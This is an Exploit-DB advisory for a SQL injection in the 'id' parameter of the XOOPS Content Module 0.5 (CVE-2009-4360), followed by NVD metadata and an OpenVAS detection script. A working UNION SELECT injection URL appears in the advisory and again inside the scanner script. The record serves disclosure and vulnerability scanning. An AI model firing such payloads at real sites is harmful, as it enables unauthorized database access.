Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability
2009-11-30T00:00:00
ID EDB-ID:33381 Type exploitdb Reporter s4r4d0 Modified 2009-11-30T00:00:00
Description
Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability. CVE-2009-4360 . Webapps exploit for php platform
source: http://www.securityfocus.com/bid/37155/info
The Content module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Content 0.5 is affected; other versions may also be vulnerable.
http://www.example.com/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11--
{"id": "EDB-ID:33381", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability", "description": "Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability. CVE-2009-4360 . Webapps exploit for php platform", "published": "2009-11-30T00:00:00", "modified": "2009-11-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/33381/", "reporter": "s4r4d0", "references": [], "cvelist": ["CVE-2009-4360"], "lastseen": "2016-02-03T19:04:26", "viewCount": 2, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2016-02-03T19:04:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4360"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900732"]}], "modified": "2016-02-03T19:04:26", "rev": 2}, "vulnersScore": 6.9}, "sourceHref": "https://www.exploit-db.com/download/33381/", "sourceData": "source: http://www.securityfocus.com/bid/37155/info\r\n\r\nThe Content module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\r\n\r\nExploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nContent 0.5 is affected; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11-- ", "osvdbidlist": ["61262"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:40:08", "description": "SQL injection vulnerability in modules/content/index.php in the Content module 0.5 for XOOPS allows remote attackers to inject arbitrary web script or HTML via the id parameter.", "edition": 4, "cvss3": {}, "published": "2009-12-20T02:30:00", "title": "CVE-2009-4360", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4360"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:handcoders:content_module:0.5"], "id": "CVE-2009-4360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:handcoders:content_module:0.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:33:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4360"], "description": "This host is running XOOPS and is prone to SQL Injection\n vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2009-12-24T00:00:00", "id": "OPENVAS:1361412562310900732", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900732", "type": "openvas", "title": "XOOPS Content Module SQL Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# XOOPS Content Module SQL Injection Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:xoops:xoops\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900732\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-12-24 14:01:59 +0100 (Thu, 24 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-4360\");\n script_bugtraq_id(37155);\n script_name(\"XOOPS Content Module SQL Injection Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_xoops_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"XOOPS/installed\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/54489\");\n script_xref(name:\"URL\", value:\"http://securityreason.com/exploitalert/7494\");\n script_xref(name:\"URL\", value:\"http://www.packetstormsecurity.org/0911-exploits/xoopscontent-sql.txt\");\n\n script_tag(name:\"summary\", value:\"This host is running XOOPS and is prone to SQL Injection\n vulnerability.\");\n\n script_tag(name:\"insight\", value:\"This flaw is due to improper sanitization of data inside 'Content'\n module within the 'id' parameter which lets the remote unauthenticated user to run arbitrary SQL Commands.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote attacker to execute arbitrary SQL\n queires to compromise the remote machine running the vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"XOOPS 'Content' Module 0.5\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nurl = dir + \"/modules/content/index.php?id=1\";\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"blockContent\" >< res && \"blockTitle\" >< res ) {\n\n url = dir + \"/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11--\";\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"Set-Cookie: \" >< res && \"PHPSESSID\" >< res && \"path=/\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}